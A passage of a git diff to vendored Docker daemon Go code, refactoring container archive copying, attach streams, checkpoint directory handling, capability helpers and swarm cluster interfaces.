resolvedPath) + baseRel, err = driver.Rel(driver.Path(), resolvedPath) } if err != nil { return err } // Make it an absolute path. - absPath = filepath.Join(string(filepath.Separator), baseRel) + absPath = driver.Join(string(driver.Separator()), baseRel) + // @ TODO: gupta-ak: Technically, this works since it no-ops + // on Windows and the file system is local anyway on linux. + // But eventually, it should be made driver aware. toVolume, err := checkIfPathIsInAVolume(container, absPath) if err != nil { return err @@ -257,14 +355,19 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return ErrRootFSReadOnly } - uid, gid := daemon.GetRemappedUIDGID() - options := &archive.TarOptions{ - NoOverwriteDirNonDir: noOverwriteDirNonDir, - ChownOpts: &archive.TarChownOptions{ - UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)? - }, + options := daemon.defaultTarCopyOptions(noOverwriteDirNonDir) + + if copyUIDGID { + var err error + // tarCopyOptions will appropriately pull in the right uid/gid for the + // user/group and will set the options. + options, err = daemon.tarCopyOptions(container, noOverwriteDirNonDir) + if err != nil { + return err + } } - if err := chrootarchive.Untar(content, resolvedPath, options); err != nil { + + if err := extractArchive(driver, content, resolvedPath, options); err != nil { return err } @@ -274,6 +377,9 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path } func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) { + if resource[0] == '/' || resource[0] == '\\' { + resource = resource[1:] + } container.Lock() defer func() { @@ -302,24 +408,28 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str return nil, err } + // Normalize path before sending to rootfs + resource = container.BaseFS.FromSlash(resource) + driver := container.BaseFS + basePath, err := container.GetResourcePath(resource) if err != nil { return nil, err } - stat, err := os.Stat(basePath) + stat, err := driver.Stat(basePath) if err != nil { return nil, err } var filter []string if !stat.IsDir() { - d, f := filepath.Split(basePath) + d, f := driver.Split(basePath) basePath = d filter = []string{f} } else { - filter = []string{filepath.Base(basePath)} - basePath = filepath.Dir(basePath) + filter = []string{driver.Base(basePath)} + basePath = driver.Dir(basePath) } - archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{ + archive, err := archivePath(driver, basePath, &archive.TarOptions{ Compression: archive.Uncompressed, IncludeFiles: filter, }) @@ -337,100 +447,3 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str daemon.LogContainerEvent(container, "copy") return reader, nil } - -// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container -// specified by a container object. -// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already). -// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths. -func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error { - srcPath := src.Path() - destExists := true - destDir := false - rootUID, rootGID := daemon.GetRemappedUIDGID() - - // Work in daemon-local OS specific file paths - destPath = filepath.FromSlash(destPath) - - c, err := daemon.GetContainer(cID) - if err != nil { - return err - } - err = daemon.Mount(c) - if err != nil { - return err - } - defer daemon.Unmount(c) - - dest, err := c.GetResourcePath(destPath) - if err != nil { - return err - } - - // Preserve the trailing slash - // TODO: why are we appending another path separator if there was already one? - if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." { - destDir = true - dest += string(os.PathSeparator) - } - - destPath = dest - - destStat, err := os.Stat(destPath) - if err != nil { - if !os.IsNotExist(err) { - //logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err) - return err - } - destExists = false - } - - uidMaps, gidMaps := daemon.GetUIDGIDMaps() - archiver := &archive.Archiver{ - Untar: chrootarchive.Untar, - UIDMaps: uidMaps, - GIDMaps: gidMaps, - } - - if src.IsDir() { - // copy as directory - if err := archiver.CopyWithTar(srcPath, destPath); err != nil { - return err - } - return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) - } - if decompress && archive.IsArchivePath(srcPath) { - // Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file) - - // First try to unpack the source as an archive - // to support the untar feature we need to clean up the path a little bit - // because tar is very forgiving. First we need to strip off the archive's - // filename from the path but this is only added if it does not end in slash - tarDest := destPath - if strings.HasSuffix(tarDest, string(os.PathSeparator)) { - tarDest = filepath.Dir(destPath) - } - - // try to successfully untar the orig - err := archiver.UntarPath(srcPath, tarDest) - /* - if err != nil { - logrus.Errorf("Couldn't untar to %s: %v", tarDest, err) - } - */ - return err - } - - // only needed for fixPermissions, but might as well put it before CopyFileWithTar - if destDir || (destExists && destStat.IsDir()) { - destPath = filepath.Join(destPath, src.Name()) - } - - if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil { - return err - } - if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil { - return err - } - - return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) -} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go new file mode 100644 index 0000000000..766ba9fdb1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go @@ -0,0 +1,15 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/pkg/archive" +) + +// defaultTarCopyOptions is the setting that is used when unpacking an archive +// for a copy API event. +func (daemon *Daemon) defaultTarCopyOptions(noOverwriteDirNonDir bool) *archive.TarOptions { + return &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + UIDMaps: daemon.idMappings.UIDs(), + GIDMaps: daemon.idMappings.GIDs(), + } +} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go new file mode 100644 index 0000000000..d70904564b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go @@ -0,0 +1,25 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" +) + +func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) { + if container.Config.User == "" { + return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil + } + + user, err := idtools.LookupUser(container.Config.User) + if err != nil { + return nil, err + } + + return &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + ChownOpts: &idtools.IDPair{UID: user.Uid, GID: user.Gid}, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go new file mode 100644 index 0000000000..5142496f03 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go @@ -0,0 +1,10 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" +) + +func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) { + return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil +} diff --git a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go index 47666fe5e8..50e6fe24be 100644 --- a/vendor/github.com/docker/docker/daemon/archive_unix.go +++ b/vendor/github.com/docker/docker/daemon/archive_unix.go @@ -1,12 +1,10 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "os" - "path/filepath" - "github.com/docker/docker/container" + volumemounts "github.com/docker/docker/volume/mounts" ) // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it @@ -14,8 +12,9 @@ import ( // cannot be configured with a read-only rootfs. func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { var toVolume bool + parser := volumemounts.NewParser(container.OS) for _, mnt := range container.MountPoints { - if toVolume = mnt.HasResource(absPath); toVolume { + if toVolume = parser.HasResource(mnt, absPath); toVolume { if mnt.RW { break } @@ -25,34 +24,8 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo return toVolume, nil } -func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { - // If the destination didn't already exist, or the destination isn't a - // directory, then we should Lchown the destination. Otherwise, we shouldn't - // Lchown the destination. - destStat, err := os.Stat(destination) - if err != nil { - // This should *never* be reached, because the destination must've already - // been created while untar-ing the context. - return err - } - doChownDestination := !destExisted || !destStat.IsDir() - - // We Walk on the source rather than on the destination because we don't - // want to change permissions on things we haven't created or modified. - return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { - // Do not alter the walk root iff. it existed before, as it doesn't fall under - // the domain of "things we should chown". - if !doChownDestination && (source == fullpath) { - return nil - } - - // Path is prefixed by source: substitute with destination instead. - cleaned, err := filepath.Rel(source, fullpath) - if err != nil { - return err - } - - fullpath = filepath.Join(destination, cleaned) - return os.Lchown(fullpath, uid, gid) - }) +// isOnlineFSOperationPermitted returns an error if an online filesystem operation +// is not permitted. +func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error { + return nil } diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go index b3a1045341..8cec39c5e4 100644 --- a/vendor/github.com/docker/docker/daemon/archive_windows.go +++ b/vendor/github.com/docker/docker/daemon/archive_windows.go @@ -1,6 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -import "github.com/docker/docker/container" +import ( + "errors" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" +) // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it // cannot be in a read-only volume. If it is not in a volume, the container @@ -12,7 +17,23 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo return false, nil } -func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { - // chown is not supported on Windows +// isOnlineFSOperationPermitted returns an error if an online filesystem operation +// is not permitted (such as stat or for copying). Running Hyper-V containers +// cannot have their file-system interrogated from the host as the filter is +// loaded inside the utility VM, not the host. +// IMPORTANT: The container lock must NOT be held when calling this function. +func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error { + if !container.IsRunning() { + return nil + } + + // Determine isolation. If not specified in the hostconfig, use daemon default. + actualIsolation := container.HostConfig.Isolation + if containertypes.Isolation.IsDefault(containertypes.Isolation(actualIsolation)) { + actualIsolation = daemon.defaultIsolation + } + if containertypes.Isolation.IsHyperV(actualIsolation) { + return errors.New("filesystem operations against a running Hyper-V container are not supported") + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go index 917237dd89..fb14691d24 100644 --- a/vendor/github.com/docker/docker/daemon/attach.go +++ b/vendor/github.com/docker/docker/daemon/attach.go @@ -1,17 +1,19 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io" - "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/container" + "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/stdcopy" "github.com/docker/docker/pkg/term" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig. @@ -21,7 +23,7 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA if c.DetachKeys != "" { keys, err = term.ToBytes(c.DetachKeys) if err != nil { - return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys) + return errdefs.InvalidParameter(errors.Errorf("Invalid detach keys (%s) provided", c.DetachKeys)) } } @@ -30,9 +32,23 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA return err } if container.IsPaused() { - err := fmt.Errorf("Container %s is paused. Unpause the container before attach", prefixOrName) - return errors.NewRequestConflictError(err) + err := fmt.Errorf("container %s is paused, unpause the container before attach", prefixOrName) + return errdefs.Conflict(err) } + if container.IsRestarting() { + err := fmt.Errorf("container %s is restarting, wait until the container is running", prefixOrName) + return errdefs.Conflict(err) + } + + cfg := stream.AttachConfig{ + UseStdin: c.UseStdin, + UseStdout: c.UseStdout, + UseStderr: c.UseStderr, + TTY: container.Config.Tty, + CloseStdin: container.Config.StdinOnce, + DetachKeys: keys, + } + container.StreamConfig.AttachStreams(&cfg) inStream, outStream, errStream, err := c.GetStreams() if err != nil { @@ -45,45 +61,69 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) } - var stdin io.ReadCloser - var stdout, stderr io.Writer - - if c.UseStdin { - stdin = inStream + if cfg.UseStdin { + cfg.Stdin = inStream } - if c.UseStdout { - stdout = outStream + if cfg.UseStdout { + cfg.Stdout = outStream } - if c.UseStderr { - stderr = errStream + if cfg.UseStderr { + cfg.Stderr = errStream } - if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil { + if err := daemon.containerAttach(container, &cfg, c.Logs, c.Stream); err != nil { fmt.Fprintf(outStream, "Error attaching: %s\n", err) } return nil } // ContainerAttachRaw attaches the provided streams to the container's stdio -func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error { +func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, doStream bool, attached chan struct{}) error { container, err := daemon.GetContainer(prefixOrName) if err != nil { return err } - return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil) + cfg := stream.AttachConfig{ + UseStdin: stdin != nil, + UseStdout: stdout != nil, + UseStderr: stderr != nil, + TTY: container.Config.Tty, + CloseStdin: container.Config.StdinOnce, + } + container.StreamConfig.AttachStreams(&cfg) + close(attached) + if cfg.UseStdin { + cfg.Stdin = stdin + } + if cfg.UseStdout { + cfg.Stdout = stdout + } + if cfg.UseStderr { + cfg.Stderr = stderr + } + + return daemon.containerAttach(container, &cfg, false, doStream) } -func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error { +func (daemon *Daemon) containerAttach(c *container.Container, cfg *stream.AttachConfig, logs, doStream bool) error { if logs { - logDriver, err := daemon.getLogger(c) + logDriver, logCreated, err := daemon.getLogger(c) if err != nil { return err } + if logCreated { + defer func() { + if err = logDriver.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + }() + } cLog, ok := logDriver.(logger.LogReader) if !ok { - return logger.ErrReadLogsNotSupported + return logger.ErrReadLogsNotSupported{} } logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1}) + defer logs.Close() LogLoop: for { @@ -92,11 +132,11 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose if !ok { break LogLoop } - if msg.Source == "stdout" && stdout != nil { - stdout.Write(msg.Line) + if msg.Source == "stdout" && cfg.Stdout != nil { + cfg.Stdout.Write(msg.Line) } - if msg.Source == "stderr" && stderr != nil { - stderr.Write(msg.Line) + if msg.Source == "stderr" && cfg.Stderr != nil { + cfg.Stderr.Write(msg.Line) } case err := <-logs.Err: logrus.Errorf("Error streaming logs: %v", err) @@ -107,41 +147,41 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose daemon.LogContainerEvent(c, "attach") - //stream - if stream { - var stdinPipe io.ReadCloser - if stdin != nil { - r, w := io.Pipe() - go func() { - defer w.Close() - defer logrus.Debug("Closing buffered stdin pipe") - io.Copy(w, stdin) - }() - stdinPipe = r - } + if !doStream { + return nil + } - waitChan := make(chan struct{}) - if c.Config.StdinOnce && !c.Config.Tty { - go func() { - c.WaitStop(-1 * time.Second) - close(waitChan) - }() - } + if cfg.Stdin != nil { + r, w := io.Pipe() + go func(stdin io.ReadCloser) { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + io.Copy(w, stdin) + }(cfg.Stdin) + cfg.Stdin = r + } - err := <-c.Attach(stdinPipe, stdout, stderr, keys) - if err != nil { - if _, ok := err.(container.DetachError); ok { - daemon.LogContainerEvent(c, "detach") - } else { - logrus.Errorf("attach failed with error: %v", err) - } - } + if !c.Config.OpenStdin { + cfg.Stdin = nil + } + + if c.Config.StdinOnce && !c.Config.Tty { + // Wait for the container to stop before returning. + waitChan := c.Wait(context.Background(), container.WaitConditionNotRunning) + defer func() { + <-waitChan // Ignore returned exit code. + }() + } - // If we are in stdinonce mode, wait for the process to end - // otherwise, simply return - if c.Config.StdinOnce && !c.Config.Tty { - <-waitChan + ctx := c.InitAttachContext() + err := <-c.StreamConfig.CopyStreams(ctx, cfg) + if err != nil { + if _, ok := errors.Cause(err).(term.EscapeError); ok || err == context.Canceled { + daemon.LogContainerEvent(c, "detach") + } else { + logrus.Errorf("attach failed with error: %v", err) } } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go index f5f4d7bf24..d32c28b8dd 100644 --- a/vendor/github.com/docker/docker/daemon/auth.go +++ b/vendor/github.com/docker/docker/daemon/auth.go @@ -1,7 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "golang.org/x/net/context" + "context" "github.com/docker/docker/api/types" "github.com/docker/docker/dockerversion" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go deleted file mode 100644 index 87bf3ef72e..0000000000 --- a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go +++ /dev/null @@ -1,5 +0,0 @@ -// +build solaris - -package daemon - -const bindMountType = "lofs" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go index 3966babb41..028e300b06 100644 --- a/vendor/github.com/docker/docker/daemon/bindmount_unix.go +++ b/vendor/github.com/docker/docker/daemon/bindmount_unix.go @@ -1,5 +1,5 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" const bindMountType = "bind" diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils.go similarity index 84% rename from vendor/github.com/docker/docker/daemon/caps/utils_unix.go rename to vendor/github.com/docker/docker/daemon/caps/utils.go index c99485f51d..c5ded542ef 100644 --- a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go +++ b/vendor/github.com/docker/docker/daemon/caps/utils.go @@ -1,12 +1,9 @@ -// +build !windows - -package caps +package caps // import "github.com/docker/docker/daemon/caps" import ( "fmt" "strings" - "github.com/docker/docker/pkg/stringutils" "github.com/syndtr/gocapability/capability" ) @@ -69,6 +66,17 @@ func GetAllCapabilities() []string { return output } +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case insensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if strings.ToLower(s) == strings.ToLower(ss) { + return true + } + } + return false +} + // TweakCapabilities can tweak capabilities by adding or dropping capabilities // based on the basics capabilities. func TweakCapabilities(basics, adds, drops []string) ([]string, error) { @@ -86,17 +94,17 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { continue } - if !stringutils.InSlice(allCaps, "CAP_"+cap) { + if !inSlice(allCaps, "CAP_"+cap) { return nil, fmt.Errorf("Unknown capability drop: %q", cap) } } // handle --cap-add=all - if stringutils.InSlice(adds, "all") { + if inSlice(adds, "all") { basics = allCaps } - if !stringutils.InSlice(drops, "all") { + if !inSlice(drops, "all") { for _, cap := range basics { // skip `all` already handled above if strings.ToLower(cap) == "all" { @@ -104,7 +112,7 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { } // if we don't drop `all`, add back all the non-dropped caps - if !stringutils.InSlice(drops, cap[4:]) { + if !inSlice(drops, cap[4:]) { newCaps = append(newCaps, strings.ToUpper(cap)) } } @@ -118,12 +126,12 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { cap = "CAP_" + cap - if !stringutils.InSlice(allCaps, cap) { + if !inSlice(allCaps, cap) { return nil, fmt.Errorf("Unknown capability to add: %q", cap) } // add cap if not already in the list - if !stringutils.InSlice(newCaps, cap) { + if !inSlice(newCaps, cap) { newCaps = append(newCaps, strings.ToUpper(cap)) } } diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go index fc8cd2752c..70b3f6b943 100644 --- a/vendor/github.com/docker/docker/daemon/changes.go +++ b/vendor/github.com/docker/docker/daemon/changes.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "errors" @@ -22,6 +22,9 @@ func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) { container.Lock() defer container.Unlock() + if container.RWLayer == nil { + return nil, errors.New("RWLayer of container " + name + " is unexpectedly nil") + } c, err := container.RWLayer.Changes() if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go index 27181743f5..4a1cb0e10e 100644 --- a/vendor/github.com/docker/docker/daemon/checkpoint.go +++ b/vendor/github.com/docker/docker/daemon/checkpoint.go @@ -1,6 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "encoding/json" "fmt" "io/ioutil" @@ -8,14 +9,49 @@ import ( "path/filepath" "github.com/docker/docker/api/types" - "github.com/docker/docker/utils" + "github.com/docker/docker/daemon/names" ) var ( - validCheckpointNameChars = utils.RestrictedNameChars - validCheckpointNamePattern = utils.RestrictedNamePattern + validCheckpointNameChars = names.RestrictedNameChars + validCheckpointNamePattern = names.RestrictedNamePattern ) +// getCheckpointDir verifies checkpoint directory for create,remove, list options and checks if checkpoint already exists +func getCheckpointDir(checkDir, checkpointID, ctrName, ctrID, ctrCheckpointDir string, create bool) (string, error) { + var checkpointDir string + var err2 error + if checkDir != "" { + checkpointDir = checkDir + } else { + checkpointDir = ctrCheckpointDir + } + checkpointAbsDir := filepath.Join(checkpointDir, checkpointID) + stat, err := os.Stat(checkpointAbsDir) + if create { + switch { + case err == nil && stat.IsDir(): + err2 = fmt.Errorf("checkpoint with name %s already exists for container %s", checkpointID, ctrName) + case err != nil && os.IsNotExist(err): + err2 = os.MkdirAll(checkpointAbsDir, 0700) + case err != nil: + err2 = err + case err == nil: + err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir) + } + } else { + switch { + case err != nil: + err2 = fmt.Errorf("checkpoint %s does not exists for container %s", checkpointID, ctrName) + case err == nil && stat.IsDir(): + err2 = nil + case err == nil: + err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir) + } + } + return checkpointAbsDir, err2 +} + // CheckpointCreate checkpoints the process running in a container with CRIU func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error { container, err := daemon.GetContainer(name) @@ -27,19 +63,22 @@ func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreat return fmt.Errorf("Container %s not running", name) } - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + if container.Config.Tty { + return fmt.Errorf("checkpoint not support on containers with tty") } if !validCheckpointNamePattern.MatchString(config.CheckpointID) { return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars) } - err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit) + checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), true) if err != nil { + return fmt.Errorf("cannot checkpoint container %s: %s", name, err) + } + + err = daemon.containerd.CreateCheckpoint(context.Background(), container.ID, checkpointDir, config.Exit) + if err != nil { + os.RemoveAll(checkpointDir) return fmt.Errorf("Cannot checkpoint container %s: %s", name, err) } @@ -54,15 +93,11 @@ func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDelet if err != nil { return err } - - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), false) + if err == nil { + return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) } - - return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) + return err } // CheckpointList lists all checkpoints of the specified container @@ -74,11 +109,9 @@ func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOpt return nil, err } - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + checkpointDir, err := getCheckpointDir(config.CheckpointDir, "", name, container.ID, container.CheckpointDir(), false) + if err != nil { + return nil, err } if err := os.MkdirAll(checkpointDir, 0755); err != nil { diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go index 98b2aa1e04..b5ac6c4856 100644 --- a/vendor/github.com/docker/docker/daemon/cluster.go +++ b/vendor/github.com/docker/docker/daemon/cluster.go @@ -1,11 +1,25 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( apitypes "github.com/docker/docker/api/types" + lncluster "github.com/docker/libnetwork/cluster" ) // Cluster is the interface for github.com/docker/docker/daemon/cluster.(*Cluster). type Cluster interface { + ClusterStatus + NetworkManager + SendClusterEvent(event lncluster.ConfigEventType) +} + +// ClusterStatus interface provides information about the Swarm status of the Cluster +type ClusterStatus interface { + IsAgent() bool + IsManager() bool +} + +// NetworkManager provides methods to manage networks +type NetworkManager interface { GetNetwork(input string) (apitypes.NetworkResource, error) GetNetworks() ([]apitypes.NetworkResource, error) RemoveNetwork(input string) error diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go index 4af035b523..35ba5a9378 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/cluster.go +++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go @@ -1,46 +1,62 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" + +// +// ## Swarmkit integration +// +// Cluster - static configurable object for accessing everything swarm related. +// Contains methods for connecting and controlling the cluster. Exists always, +// even if swarm mode is not enabled. +// +// NodeRunner - Manager for starting the swarmkit node. Is present only and +// always if swarm mode is enabled. Implements backoff restart loop in case of +// errors. +// +// NodeState - Information about the current node status including access to +// gRPC clients if a manager is active. +// +// ### Locking +// +// `cluster.controlMutex` - taken for the whole lifecycle of the processes that +// can reconfigure cluster(init/join/leave etc). Protects that one +// reconfiguration action has fully completed before another can start. +// +// `cluster.mu` - taken when the actual changes in cluster configurations +// happen. Different from `controlMutex` because in some cases we need to +// access current cluster state even if the long-running reconfiguration is +// going on. For example network stack may ask for the current cluster state in +// the middle of the shutdown. Any time current cluster state is asked you +// should take the read lock of `cluster.mu`. If you are writing an API +// responder that returns synchronously, hold `cluster.mu.RLock()` for the +// duration of the whole handler function. That ensures that node will not be +// shut down until the handler has finished. +// +// NodeRunner implements its internal locks that should not be used outside of +// the struct. Instead, you should just call `nodeRunner.State()` method to get +// the current state of the cluster(still need `cluster.mu.RLock()` to access +// `cluster.nr` reference itself). Most of the changes in NodeRunner happen +// because of an external event(network problem, unexpected swarmkit error) and +// Docker shouldn't take any locks that delay these changes from happening. +// import ( - "crypto/x509" - "encoding/base64" - "encoding/json" + "context" "fmt" - "io" - "io/ioutil" "net" "os" "path/filepath" - "runtime" - "strings" "sync" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - apierrors "github.com/docker/docker/api/errors" - apitypes "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/backend" - "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" types "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/daemon/cluster/controllers/plugin" executorpkg "github.com/docker/docker/daemon/cluster/executor" - "github.com/docker/docker/daemon/cluster/executor/container" - "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/signal" - "github.com/docker/docker/pkg/stdcopy" - "github.com/docker/docker/reference" - "github.com/docker/docker/runconfig" + lncluster "github.com/docker/libnetwork/cluster" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/manager/encryption" swarmnode "github.com/docker/swarmkit/node" - "github.com/docker/swarmkit/protobuf/ptypes" "github.com/pkg/errors" - "golang.org/x/net/context" - "google.golang.org/grpc" + "github.com/sirupsen/logrus" ) const swarmDirName = "swarm" @@ -56,29 +72,10 @@ const ( contextPrefix = "com.docker.swarm" ) -// ErrNoSwarm is returned on leaving a cluster that was never initialized -var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm") - -// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated -var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.") - -// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet. -var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.") - -// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. -var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.") - -// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. -var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.") - -// 